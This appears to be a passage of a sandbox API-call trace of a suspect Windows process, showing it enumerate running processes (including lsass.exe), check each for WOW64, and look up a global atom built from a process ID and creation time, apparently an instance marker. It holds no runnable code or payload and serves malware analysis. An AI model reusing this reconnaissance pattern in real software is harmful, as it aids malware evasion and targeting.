	[0096.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.128] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.128] CloseHandle (hObject=0x248) returned 1
	[0096.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.128] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.128] CloseHandle (hObject=0x248) returned 1
	[0096.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.128] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.128] CloseHandle (hObject=0x248) returned 1
	[0096.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.128] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.128] CloseHandle (hObject=0x248) returned 1
	[0096.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.129] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.129] CloseHandle (hObject=0x248) returned 1
	[0096.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.129] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.129] CloseHandle (hObject=0x248) returned 1
	[0096.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.129] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.129] CloseHandle (hObject=0x248) returned 1
	[0096.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.129] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.129] CloseHandle (hObject=0x248) returned 1
	[0096.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.129] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.130] CloseHandle (hObject=0x248) returned 1
	[0096.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.130] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.130] CloseHandle (hObject=0x248) returned 1
	[0096.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.130] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.130] CloseHandle (hObject=0x248) returned 1
	[0096.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.130] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.130] CloseHandle (hObject=0x248) returned 1
	[0096.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.130] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.130] CloseHandle (hObject=0x248) returned 1
	[0096.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.131] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.131] CloseHandle (hObject=0x248) returned 1
	[0096.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.131] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.131] CloseHandle (hObject=0x248) returned 1
	[0096.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.131] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.172] CloseHandle (hObject=0x248) returned 1
	[0096.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.172] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.173] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.173] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.173] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.173] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.173] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.174] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.174] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.174] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.174] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.174] CloseHandle (hObject=0x248) returned 1
	[0096.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.174] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.174] CloseHandle (hObject=0x248) returned 1
	[0096.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.174] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.174] CloseHandle (hObject=0x248) returned 1
	[0096.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16638) returned 0xc0000004
	[0096.271] VirtualAlloc (lpAddress=0x0, dwSize=0x16738, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16738, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ac48, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.280] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.280] CloseHandle (hObject=0x248) returned 1
	[0096.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.281] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.281] CloseHandle (hObject=0x248) returned 1
	[0096.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658f48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.282] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.282] CloseHandle (hObject=0x248) returned 1
	[0096.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.282] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.282] CloseHandle (hObject=0x248) returned 1
	[0096.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.283] CloseHandle (hObject=0x248) returned 1
	[0096.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.283] CloseHandle (hObject=0x248) returned 1
	[0096.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658ee8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.283] CloseHandle (hObject=0x248) returned 1
	[0096.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.284] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.284] CloseHandle (hObject=0x248) returned 1
	[0096.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.285] CloseHandle (hObject=0x248) returned 1
	[0096.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.285] CloseHandle (hObject=0x248) returned 1
	[0096.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.286] CloseHandle (hObject=0x248) returned 1
	[0096.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658d28, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.286] CloseHandle (hObject=0x248) returned 1
	[0096.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.286] CloseHandle (hObject=0x248) returned 1
	[0096.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.287] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.287] CloseHandle (hObject=0x248) returned 1
	[0096.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x6590a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.287] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.287] CloseHandle (hObject=0x248) returned 1
	[0096.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.288] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.288] CloseHandle (hObject=0x248) returned 1
	[0096.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x6590c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.288] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.288] CloseHandle (hObject=0x248) returned 1
	[0096.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.289] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.289] CloseHandle (hObject=0x248) returned 1
	[0096.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.289] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.289] CloseHandle (hObject=0x248) returned 1
	[0096.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.290] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.290] CloseHandle (hObject=0x248) returned 1
	[0096.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658e08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.290] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.290] CloseHandle (hObject=0x248) returned 1
